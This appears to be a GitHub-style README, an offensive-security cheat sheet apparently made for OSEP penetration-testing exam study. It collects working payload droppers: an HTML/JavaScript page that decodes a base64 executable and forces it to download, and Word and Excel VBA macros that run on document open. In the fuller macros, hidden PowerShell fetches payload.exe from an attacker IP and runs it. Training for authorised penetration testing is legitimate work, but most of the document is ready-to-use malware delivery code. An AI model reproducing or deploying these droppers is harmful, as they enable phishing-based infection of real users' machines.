Go to file
Jordan ERNST 543c02c64c Inital commit 2023-05-07 17:21:56 +02:00
examples Inital commit 2023-05-07 17:21:56 +02:00
README.md Inital commit 2023-05-07 17:21:56 +02:00

README.md

Cheatsheet-OSEP

Droppers

HTML

This saves the executable in Downloads (if user allows).

Encode your payload with base64 payload.exe -w 0 | kitty +kitten clipboard and replace it.

Adapt fileName if needed.

Works as expected in:

  • Chrome
  • Edge
  • Internet Explorer
<html>

<body>
	<script>
		function base64ToArrayBuffer(base64) {
			var binary_string = window.atob(base64);
			var len = binary_string.length;
			var bytes = new Uint8Array(len);
			for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
			return bytes.buffer;
		}
		/* base64 demon.x64.exe -w 0 | kitty +kitten clipboard */
		var fileName = 'msfstaged.exe';
		console.log('START');
		var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAA...';
		var data = base64ToArrayBuffer(file);
		var blob = new Blob([data], { type: 'octet/stream' });

		console.log('Before Elem');

		if (window.navigator.msSaveBlob) {
			// IE/Edge
			console.log('Edge/Internet Explorer');
			window.navigator.msSaveBlob(blob, fileName);
		}
		else {
			console.log('Chrome/Firefox or others');
			var a = document.createElement('a');
			document.body.appendChild(a);
			a.style = 'display: none';
			var url = window.URL.createObjectURL(blob);
			a.href = url;
			a.download = fileName;
			a.click();
			window.URL.revokeObjectURL(url);
		}
		console.log('END');
	</script>
</body>

</html>

Office

Word

Basic example

.docx doesn't support embedding macros, save as .doc or docm.

Shell method:

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide
End Sub

Example file

Windows Script Host method:

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub

Example file

Full dropper and execution

Shell method:

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'payload.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\payload.exe"
    Sleep (6)
    Shell exePath, vbHide

End Sub

Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Windows Script Host method:

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'payload.exe')"
    CreateObject("Wscript.Shell").Run str, 0
    Dim exePath As String
    exePath = ActiveDocument.Path + "\payload.exe"
    Sleep (6)
    CreateObject("Wscript.Shell").Run exePath, 0

End Sub

Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Excel

Basic example

Shell method:

Sub Workbook_Open()
    MyMacro
End Sub

Sub Auto_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide
End Sub

Example file

Windows Script Host method:

Sub Workbook_Open()
    MyMacro
End Sub

Sub Auto_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub

Example file

Full dropper and execution

Shell method:

Sub Workbook_Open()
    MyMacro
End Sub

Sub Auto_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'C:\Windows\Temp\payload.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\Windows\Temp\payload.exe"
    Sleep (6)
    Shell exePath, vbHide

End Sub

Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Windows Script Host method:

Sub Workbook_Open()
    MyMacro
End Sub

Sub Auto_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'C:\Windows\Temp\payload.exe')"
    CreateObject("Wscript.Shell").Run str, 0
    Dim exePath As String
    exePath = "C:\Windows\Temp\payload.exe"
    Sleep (6)
    CreateObject("Wscript.Shell").Run exePath, 0

End Sub

Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub